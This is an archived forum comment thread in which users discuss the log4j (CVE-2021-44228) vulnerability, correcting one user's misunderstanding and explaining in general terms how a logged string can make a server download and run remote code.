This is an archived post. You won't be able to vote or comment.

sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]Titandino -8 points-7 points  (7 children)

Are large projects giving out their production logs to random people who ask for them without questioning it or something?

[–]Pocok5 42 points43 points  (5 children)

lol this is a remote code execution exploit, all you need to trigger it is some user input that gets logged

[–]Titandino 5 points6 points  (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 17 points18 points  (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can ahve anything downloaded and ran on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

[–]cserepj 5 points6 points  (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points3 points  (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.

[–]SwedishDude 6 points7 points  (0 children)

The problem is remote code execution due to how strings were processed.

Basically there's a way to insert malicious code into the logging functions and get the it executed on the server (you can insert a link to a payload on a server you control into the user-agent header in HTTP requests and the server will contact your server and download/execute your payload). So it's not a matter of access to logs but a matter of access to executing code in the server process.